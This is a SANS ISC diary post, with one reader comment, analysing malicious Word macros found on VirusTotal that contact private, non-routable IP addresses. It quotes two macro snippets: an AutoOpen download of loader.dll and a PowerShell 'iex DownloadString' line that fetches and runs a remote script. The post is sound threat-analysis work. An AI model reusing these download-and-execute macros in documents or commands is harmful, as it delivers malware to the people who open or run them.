Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: Private IP Addresses in Malware Samples? - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Private IP Addresses in Malware Samples?

I'm looking for some samples on VT that contains URLs with private or non-routable IP addresses (RFC1918)[1]. I found one recently and it made me curious. Why would a malware try to connect to a non-routable IP address?

Here is an example of a macro found in a suspicious Word document (SHA256: c5226e407403b37d36e306f644c3b8fde50c085e273c897ff3f36a23ca0f1c6a)[2]: 

Sub AutoOpen()
'
' test Macro
'
'
x = URLDownloadToFileA(0, "http://10.200.235.200:/loader.dll", Environ("TEMP") & "\loader.dll", 0, 0)

End Sub

This one seems to be ongoing development and does not look too dangerous. But, wait, the use of VirusTotal can be very sensitive depending on your context and submitting files to VirusTotal must be performed carefully. If you are a Blue-teamer, uploading a sample might ring a bell at the attacker and let him know that you're looking at him. If you're a Red-teamer, uploading your self-made sample might help AV vendors to improve their detection mechanisms.

Here is another one found in another document with a higher VT score (22/57)[3]

Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
    strCommand = "powershell iex (New-Object Net.WebClient).DownloadString('http://172.16.17.22/PowerUpDev.ps1')"
    Set WshShell = CreateObject("WScript.Shell")
    Set WshShellExec = WshShell.Exec(strCommand)
    strOutput = WshShellExec.StdOut.ReadAll
    MsgBox strOutput
End Sub

Besides classic macros, I found also a lot of DLL's and DEX files (Dalvik Executable from Android applications) that contains URLs with RFC1918 IP addresses.  I think that most of them are samples still being tested/developed.

[1] https://tools.ietf.org/html/rfc1918
[2] https://www.virustotal.com/gui/file/c5226e407403b37d36e306f644c3b8fde50c085e273c897ff3f36a23ca0f1c6a/detection
[3] https://www.virustotal.com/gui/file/cdd3bdced038414f84c318fdc4b2e6573e99900fb792dd417869721cc7975b84/detection

Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Xme

475 Posts
ISC Handler
Well. Never under estimate silly mistakes. If the good guys make them the bad guys will make them too.
If an IP address starts with 192 there is an semi-automatic response to type 192.168 even when I need an actual public IP address starting with 192.
So I understand some of them.

Also some ISP's use private addresses on the network that can reach from your mobile device.
So this can be an attemt to hack in to them.

And I am sure there are other use cases.
Anonymous

Sign Up for Free or Log In to start participating in the conversation!